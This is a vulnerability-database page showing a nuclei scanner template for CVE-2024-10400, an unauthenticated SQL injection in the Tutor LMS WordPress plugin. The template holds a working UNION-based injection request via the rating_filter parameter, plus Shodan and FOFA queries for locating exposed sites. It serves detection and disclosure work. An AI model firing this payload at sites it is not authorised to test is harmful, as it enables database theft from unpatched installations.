Lucene search
+L

Tutor LMS <= 2.7.6 - SQL Injection

🗓️ 10 Sep 2026 04:50:45Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 174 Views

Tutor LMS versions <= 2.7.6 are vulnerable to SQL Injection via rating_filter, posing high risk.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2024-10400
21 Nov 202407:42
circl
cnnvd
CNNVD
WordPress plugin Tutor LMS SQL注入漏洞
21 Nov 202400:00
cnnvd
cve
CVE
CVE-2024-10400
21 Nov 202407:35
cve
cvelist
Cvelist
CVE-2024-10400 Tutor LMS <= 2.7.6 - Unauthenticated SQL Injection via rating_filter
21 Nov 202407:35
cvelist
kitploit
Kitploit
CVE-2024-10400
10 Sep 202601:05
kitploit
nvd
NVD
CVE-2024-10400
21 Nov 202411:15
nvd
osv
OSV
CVE-2024-10400
21 Nov 202411:15
osv
patchstack
Patchstack
WordPress Tutor LMS plugin <= 2.7.6 - Unauthenticated SQL Injection via rating_filter vulnerability
21 Nov 202422:31
patchstack
patchstack
Patchstack
WordPress Tutor LMS Plugin <= 2.7.6 is vulnerable to SQL Injection
21 Nov 202400:00
patchstack
ptsecurity
Positive Technologies
PT-2024-16247 · WordPress · Tutor Lms
21 Nov 202400:00
ptsecurity
Rows per page
id: CVE-2024-10400

info:
  name: Tutor LMS <= 2.7.6 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The Tutor LMS plugin for WordPress is vulnerable to SQL Injection via the ‘rating_filter’ parameter in all versions up to, and including, 2.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries via the rating_filter parameter, potentially extracting sensitive database information including user credentials and course data.
  remediation: |
    Update Tutor LMS plugin to version 2.7.7 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor/tutor-lms-276-unauthenticated-sql-injection-via-rating-filter
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10400
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-10400
    cwe-id: CWE-89
    epss-score: 0.8312
    epss-percentile: 0.99655
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/tutor/"
    fofa-query: body="/wp-content/plugins/tutor/"
  tags: cve,cve2024,tutor-lms,lms,sqli,vkev,vuln

variables:
  num: '999999999'

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - '"_tutor_nonce":"([a-z0-9]+)"'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=load_filtered_instructor&_tutor_nonce={{nonce}}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5({{num}}),version()),11,12,14--+-

    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
          - '"success":true'
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'alt=\\".*?:(.*?)\\"'
# digest: 4b0a00483046022100c5351517cb45e65844353a5078e2259e07c791e21bdc863bb086517ee0cec72202210099e285bb1cc041e4388c0b8b8ccf9f9c1127e1d0f7a6add940c0685737815cba:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.17.5
EPSS0.8312
SSVC
174